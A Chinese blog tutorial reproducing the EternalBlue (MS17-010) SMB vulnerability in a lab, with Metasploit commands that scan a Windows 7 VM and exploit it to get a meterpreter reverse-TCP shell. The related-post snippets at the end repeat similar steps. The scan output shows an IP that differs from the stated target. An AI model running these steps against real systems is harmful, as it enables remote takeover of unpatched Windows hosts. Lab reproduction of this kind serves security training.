复现永恒之蓝提权漏洞

最新推荐文章于 2024-06-02 16:50:45 发布
最新推荐文章于 2024-06-02 16:50:45 发布
阅读量891 收藏 19
点赞数 20
分类专栏: 网络安全 文章标签: 网络安全 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47460431/article/details/135217072
版权

永恒之蓝漏洞介绍

        永恒之蓝漏洞是指一种影响Windows操作系统的网络攻击漏洞,它是由美国国家安全局(NSA)开发的一种工具被黑客组织“影子经纪人”泄露而暴露出来的。这个漏洞影响了许多Windows操作系统版本,包括Windows XP、Windows 7、Windows 8和Windows Server 2003等。永恒之蓝漏洞利用了Windows操作系统中的SMB(Server Message Block)协议中的一个缓冲区溢出漏洞。黑客可以通过利用这个漏洞远程执行恶意代码,并在受影响的系统上进行攻击。

        这个漏洞于2017年5月被公开,并很快被恶意攻击者广泛利用。最著名的一次攻击是“ WannaCry”勒索软件攻击,它利用了永恒之蓝漏洞来感染大量的Windows系统,导致全球范围内的大规模勒索软件攻击。微软公司推出了相应的安全补丁来修复永恒之蓝漏洞,并建议用户及时更新其系统。此外,用户还可以采取其他安全措施,如使用防火墙、安装杀毒软件和定期备份数据等来保护自己的系统免受永恒之蓝漏洞的攻击。

虚拟机信息

虚拟机IP地址
Kali Linux攻击主机192.168.1.2/24
Windows7靶机192.168.1.3/24

1. 使用Metasploit框架扫描漏洞

在复现前,确保Kali Linux攻击主机与Windows7靶机能够ping通,Windows7靶机上已经关闭防火墙。

(1)在Kali Linux主机上使用“msfconsole”命令启动Metasploit模块。

(2)在Metasploit框架下使用“use auxiliary/scanner/smb/smb_ms17_010”加载扫描模块。

msf6 > use auxiliary/scanner/smb/smb_ms17_010 
msf6 auxiliary(scanner/smb/smb_ms17_010) >

(3)在Metasploit框架下使用“set RHOSTS 192.168.1.3”设置扫描的主机地址。

msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.1.3
rhosts => 192.168.1.3

(4)在Metasploit框架下使用“exploit”进行测试,扫描到该主机上存在永恒之蓝漏洞。

msf6 auxiliary(scanner/smb/smb_ms17_010) > exploit

[+] 192.168.1.100:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7600 x64 (64-bit)
[*] 192.168.1.100:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

2.使用Metasploit框架进行渗透

(1)在Metasploit框架下使用“use exploit/windows/smb/ms17_010_eternalblue”命令加载攻击模块。

msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue 
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

(2)在Metasploit框架下使用“set rhosts”命令设置目标主机地址,使用“set lhost”命令设置攻击主机地址。

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.1.3
rhosts => 192.168.1.3
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.2
lhost => 192.168.1.2

(3)在Metasploit框架下使用“set payload windows/x64/ meterpreter/reverse_tcp”命令设置攻击载荷。

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

(4)在Metasploit框架下使用“show options”命令查看ms17_010漏洞模块所需参数是否配置正确。

3.验证效果

(1)在Metasploit框架下使用“exploit”命令对永恒之蓝漏洞进行渗透测试,可以查看到渗透测试已经成功。

(2)在Meterpreter通道下使用“ipconfig”命令查看到Windows7靶机的地址信息。

鸢时望巧
关注
  • 20
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
0x20.第二十课 MetaSploit检测并永恒之蓝.pdf
06-24
0x20.第二十课 MetaSploit检测并永恒之蓝.pdf
渗透基础笔记+作业(永恒之蓝
09-08
渗透测试是一种重要的网络安全评估方法...对于特定的漏洞如“永恒之蓝”,了解其工作原理和过程,对于提高网络安全防护至关重要。同时,测试报告的编写也是整个过程的成果展示,为防御者提供了改进安全策略的依据。
MS17-010(永恒之蓝)漏洞分析与并通过NC提权
weixin_49905950的博客
06-05 485
讲解如何利用永恒之蓝攻击 win2008 靶机并植入nc木马,让win7在开机启动注册表中添加内容,实nc.exe开机自启。并在kali里面进行连接,验证上述操作是否成功。
利用永恒之蓝漏洞渗透win2008并提取主机权限
weixin_65633498的博客
04-10 384
一、漏洞介绍漏洞名称:永恒之蓝漏洞编号:MS17-010漏洞产生的服务:smb----445影响的版本:全系列windows系统漏洞库介绍:MS微软漏洞库,17--2017年,010--第10个漏洞;二、查看漏洞工具:nmap漏洞特征:1.135139445端口开放nmap -sS受害机IP-p端口范围扫描操作系统,如果版本较低,则漏洞存在nmap -O受害机IP三、漏洞利用1、打开metsploit。
EternalBlue【永恒之蓝】漏洞详解(、演示、远程,淘汰了80%的网络安全面试者
2401_83947434的博客
04-15 865
Meterpreter的功能丰富,例如添加用户、隐藏某些内容、打开shell、获取用户密码、上传和下载远程主机的文件、运行cmd.exe、捕捉屏幕、获取远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等。同时,它还提供了多种实用的功能,如实时监控、木马查杀、漏洞等,可以帮助用户保护电脑安全,提高使用体验。火绒安全软件则是一款以防护为主打功能的电脑安全软件,它拥有自主知识产权的新一代反病毒引擎,能够检测和分析恶意程序,提供全面的防护功能。
永恒之蓝 (EternalBlue) 漏洞利用原理详解
最新发布
volta_xu的博客
06-02 568
SMB(Server Message Block)协议是一种网络文件共享协议,主要用于文件和打印机共享。SMB协议允许客户端通过网络访问服务器上的文件、目录和其他资源。在Windows中,SMB协议是默认启用的,用于提供文件共享服务。
MS17-010永恒之蓝-漏洞利用+修方法
WEB渗透测试 从入门到萌新
04-21 8152
系列文章目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 系列文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的
MSF永恒之蓝漏洞利用详解[漏洞验证利用及后渗透]【详细版】
h1008685的博客
04-05 835
MSF永恒之蓝漏洞利用详解[查找脚本,漏洞验证,漏洞利用,获取用户凭证,屏幕监控,进程迁移,键盘记录,防火墙配置指定端口,禁用UAC,使用nc(瑞士军刀)工具设置持久性后门,配置计划任务]
永恒之蓝漏洞(详细版)
Zqinglele的博客
03-20 2155
matesploit框架(Matesploit Framework,MSF)是一个开源工具,由Ruby程序语言编写的模块化框架,主要为后端提供用来测试的端口(如控制台、Web、CLI)。常用为控制台接口,通过该接口可以访问matesploit框架的所有插件(如payloads、利用模块、post模块等),还可使用第三方程序的插件(如sqlmap、nmap等)。这下只需配置靶机IP地址、命名的管道、端口、线程数(后三个已经配置好了)成功发可利用漏洞ms17-010,,扫描模块结束,接下尝试进行攻击。
【内网安全】横向移动&域控提权&NetLogon&ADCS&PAC&KDC&永恒之蓝
今天是几号的博客
04-02 1136
当Windows系统的Active Directory证书服务(CS)在域上运行时,由于机器账号中的dNSHostName属性不具有唯一性,域中普通用户可以将其更改为高权限的域控机器账号属性,然后从Active Directory证书服务中获取域控机器账户的证书,导致域中普通用户权限提升为域管理员权限。
msf渗透测试学习-与永恒之蓝漏洞案例
weixin_49349476的博客
06-08 4494
MSF是Metasploit Framework的缩写,是一款广泛使用的渗透测试工具,具有强大的攻击功能。它提供了一个模块化的平台,通过将各种攻击载荷、漏洞利用和辅助工具组装在一起,可用于模拟各种攻击,测试系统安全性,也可以用于执行红队实战训练、漏洞挖掘等工作。
kali基础渗透学习,永恒之蓝,木马实战
killsime的博客
04-08 1372
即 MetaSploit Framework,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。可以满足渗透测试的全过程metasploit让杂的漏洞攻击流程变的非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击本质是利用别人开发好的工具,只能对一些老旧系统攻击如下,模拟使用msf利用永恒之蓝漏洞(因为可以导致蓝屏命名)在终端输入下面代码启动msfdb initmsfconsole可以db_status。
网络安全入门第一课—永恒之蓝(ms17-010)
m0_56088051的博客
07-13 5772
一、永恒之蓝(Eternal Blue)永恒之蓝相关病毒,其实是利用了微软的MS17-010漏洞。MS17-010是Windows系统一个底层服务的漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序二、实验环境。
记录一次永恒之蓝(ms17-010)漏洞攻击 【后附msf常用命令】
向安全进发的博客
03-28 3734
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢文件。#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有。
永恒之蓝漏洞利用攻击以及修方法
Gjqhs的博客
12-12 6918
MS17-010(Eternal blue永恒之蓝)漏洞利用+修方法 前言 0x01 准备工作 0x02 漏洞利用 0x03 修方案 总结 前言 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。 该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了.
永恒之蓝漏洞攻击
qq_54250695的博客
05-16 2050
使用方法 进入框架:msfconsole 使用sear kali ip: 采用nat的桥接模式: 保证kali和win7能够通信 nmap -sS -A win7ip (查看攻击对象win7所开放的所有端口) msfconsole (启动渗透框架) search ms17_010 (查看ms17_010模块工具) 选择攻击模块: use exploit/windows/smb/ms17_010_e...
使用MSF永恒之蓝
11-27
为了使用MSF永恒之蓝漏洞,可以按照以下步骤进行操作: 1. 打开终端并启动msfconsole,输入以下命令: ```shell msfconsole ``` 2. 在msfconsole中,使用search命令搜索ms17-010漏洞: ```shell search ms17-010 ``` 3. 选择一个合适的exploit并设置相关参数,例如: ```shell use exploit/windows/smb/ms17_010_eternalblue set RHOSTS <目标IP地址> set RPORT 445 ``` 4. 运行exploit并等待结果: ```shell run ``` 5. 如果成功利用漏洞,将会得到一个Meterpreter shell,可以使用各种命令进行操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值